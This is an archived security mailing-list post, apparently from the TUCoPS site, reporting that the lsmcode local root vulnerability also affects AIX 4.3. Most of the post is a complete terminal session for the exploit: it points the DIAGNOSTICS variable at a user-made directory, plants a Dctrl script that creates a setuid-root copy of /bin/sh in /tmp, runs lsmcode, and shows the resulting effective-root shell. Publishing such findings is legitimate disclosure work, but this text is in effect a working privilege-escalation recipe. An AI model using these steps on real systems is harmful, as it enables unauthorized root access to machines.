Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: Various Flavours :: tb10162.htm

AIX 4.3 lsmcode local root command execution



AIX 4.3 lsmcode local root command execution
AIX 4.3 lsmcode local root command execution



It has been reported on http://www.securityfocus.com/bid/18114/ 
about this vulnerability in AIX 5.1 - 5.3,
some exploits is published in milw0rm to exploits this issue http://milw0rm.com/exploits/701 

I have an AIX 4.3 box and it seems vulnerable with this issue too

bash-2.04$ mkdirhier /tmp/aap/bin
bash-2.04$ export DIAGNOSTICS=/tmp/aap
bash-2.04$ cat > /tmp/aap/bin/Dctrl << EOF
> #!/bin/sh
> cp /bin/sh /tmp/.shh
> chown root:system /tmp/.shh
> chmod u+s /tmp/.shh
> EOF
bash-2.04$ cat /tmp/aap/bin/Dctrl
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
bash-2.04$ chmod a+x /tmp/aap/bin/Dctrl
bash-2.04$ lsmcode
bash-2.04$ /tmp/.shh
# id
uid=221(xxx) gid=53(xxx) euid=0(root) groups=0(system),58(xxx)  --> gotcha euid=0

Yeah, even uid=221 but euid=0
Nothing new in this post, i just want to report that AIX 4.3 is vulnerable with this issue too

AO


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH